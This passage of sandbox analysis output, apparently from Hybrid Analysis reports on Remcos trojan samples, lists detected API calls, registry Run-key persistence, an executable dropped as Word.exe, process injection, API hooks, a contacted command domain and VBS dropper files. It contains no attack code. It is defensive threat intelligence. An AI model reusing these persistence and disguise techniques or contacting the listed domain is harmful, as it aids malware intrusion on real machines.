140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006d28e82598da12006d822b75a40d2c0004010000 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300039006500640061003100300039003000310037003100300063003600640062003500350065003500320032003800610032006100610034003300650037003300310038006100390035003800380031003000650064003500360039003300330033002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2be7769d16bc76d8eb9a75ac0127000000270000000000000000000800d400df030000000000000000000000000000000000000900cf00df0300000000000000000000d86f270000000000200000000000000000000000 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2be7766d35bc767ce71200cc01270000002700000000000000000017002b015e04000000000000000000000000000018000000180022015e04000038f811001ce71200e0e61200000000008e00000030e71200feffffffb8e61200cf00e876d600e8766535bc768e0000004700000030e71200000000008ce6120095e1e376 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000020562e0000000000f43600c2340000c048582e00c4002700500d2e00003b0000000027000000000020562e00dce812000464e77638012700e063e776013bbc76000000000000270028562e006dd18275931ba8256caea6750000000000000000d8be15753837000fc40027000100000000002700500127000c00000028562e0000000000020000001800000030000000b8e812000000000000000000030000007ce812003c6ee776000000000000000000000000d8a92900c0758a75d8a9290000000000c0758a7598e8120079da82750000000002000000f0e81200ff2be776 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e00d0d42e00cbd42e000000000000000000000027000000000114d912000000000078e6120095e1e376f5c14900feffffff435ce7765059e776aa000000b8000000cad42e00c8d42e009cda1200d4de120000000000000000000000000000000000000000000000000000000000000000001c5ce67660d8e074ffffffff170000004cda120024000000030000003cdf120068e41200d4de12008600000078da120096ede776f2d42e00a06abd74860000009cda1200d4de12000000000086008800a06abd749cda1200916cbd74f2d42e00a06abd74a06abd740cdf120002020000 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004116)\n \"Word.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004116)\n \"Word.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004116)\n \"Word.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WORD.EXE\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WORD.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"Word.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9a7508c02b000090fd7f9a5ce87600f0fd7f00c612004490fd7f00000000400000003f000000200000000090fd7ff4c51200c15ce8766082ef76200000000090fd7f9a5ce87600f0fd7f18c612005789e7768083ef761317e174d8eb9a75 (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: 8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333]\n Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: Word.exe.bin]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"FindFirstFileW\" with parameter %ALLUSERSPROFILE%\\Program\\*.* (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004116)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" called \"FindNextFileW\" with parameter Word.exe (UID: 00000000-00004116)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-81", "type": 7, "relevance": 5, "name": "High entropy domain detected", "description": "Contacted domain: \"7909PUERTOREMCOST.4cloud.click\" has high entropy", "origin": "Network Traffic", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" opened \"\\Device\\KsecDD\"\n \"Word.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"Word.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"Word.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: 8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333]\n Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: Word.exe.bin]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: 8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333]\n Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: Word.exe.bin]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has resource with unusual entropy \"RT_RCDATA:7.627514366126073\"\n \"Word.exe.bin\" has resource with unusual entropy \"RT_RCDATA:7.627514366126073\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"Word.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Word.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Program\\Word.exe]- [targetUID: 00000000-00004116]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-NBPOVK\"; Value: \"\"%ALLUSERSPROFILE%\\Program\\Word.exe\"\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-NBPOVK\"; Value: \"\"%ALLUSERSPROFILE%\\Program\\Word.exe\"\")\n \"Word.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"Word.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-NBPOVK\"; Value: \"\"%ALLUSERSPROFILE%\\Program\\Word.exe\"\")\n \"Word.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"Word.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-NBPOVK\"; Value: \"\"%ALLUSERSPROFILE%\\Program\\Word.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has section name .text with entropy \"6.6273936921798455\"\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333\" has section name .reloc with entropy \"6.723768218094163\"\n \"Word.exe.bin\" has section name .text with entropy \"6.6273936921798455\"\n \"Word.exe.bin\" has section name .reloc with entropy \"6.723768218094163\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%ALLUSERSPROFILE%\\Program\\Word.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "16/22 Antivirus vendors marked spawned process \"Word.exe\" (PID: 5548) as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)\n 16/22 Antivirus vendors marked spawned process \"Word.exe\" (PID: 644) as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "16/22 Antivirus vendors marked dropped file \"Word.exe.bin\" as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"Word.exe\" as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-27", "type": 8, "relevance": 7, "name": "Drops executable files to the application program directory (%ProgramData%)", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%ALLUSERSPROFILE%\\Program\\Word.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" wrote 32 bytes to a remote process \"C:\\ProgramData\\Program\\Word.exe\" (Handle: 564)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" wrote 52 bytes to a remote process \"C:\\ProgramData\\Program\\Word.exe\" (Handle: 564)\n \"8ff2524da2305109eda10901710c6db55e5228a2aa43e7318a958810ed569333.exe\" wrote 4 bytes to a remote process \"C:\\ProgramData\\Program\\Word.exe\" (Handle: 564)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"Word.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"Word.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"Word.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"Word.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"Word.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Cryptographic Related", "identifier": "hooks-1", "type": 11, "relevance": 10, "name": "Hooks key cryptographic functions of the CryptoAPI", "description": "\"DecryptMessage@SSPICLI.DLL\" in \"Word.exe\"\n \"EncryptMessage@SSPICLI.DLL\" in \"Word.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859
https://hybrid-analysis.com/sample/02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859
Hybrid Analysis - Remcos
{"size": 380928, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859", "sha256": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859", "av_detect": 89, "vx_family": "Backdoor.Remcos", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 22, "total_signatures": 241, "extracted_files": [{"name": "remcos.exe", "file_path": "%APPDATA%\\remcos\\remcos.exe", "file_size": 380928, "sha256": "c6451ff86bc892f12450721e68a8c1d2c05e13881ee72bd5605b896bd5ed0823", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "hab.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hab.exe", "file_path": "%TEMP%\\hab.exe", "file_size": 380928, "sha256": "41041f54df0cdc0fb85a922d7ded1de534e0cc5366551785ea9d24070c695af9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WScript.exe (PID: 5392)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hab.vbs", "file_path": "%TEMP%\\hab.vbs", "file_size": 94, "sha256": "f6d7a1d3610e961155a744a19c8da5506fdb58edc7802307f1721a67de2e7656", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe (PID: 4744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "install.vbs", "file_path": "%TEMP%\\install.vbs", "file_size": 544, "sha256": "284befd9ca0d4ec1a2722cbb0e682d17c70a5ff721bc6d23865a3e6832344568", "type_tags": ["data"], "description": "data", "runtime_process": "WScript.exe (PID: 5392)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "win.ini", "file_path": "%WINDIR%\\win.ini", "file_size": 507, "sha256": "3136215383c0ca2991297bfcd6648b719a7f57d3b93f021bec11583e45ef7e37", "type_tags": ["data"], "description": "data", "runtime_process": "hab.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 9782)", "8 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8783)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (10 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00004836", "name": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe", "normalized_path": 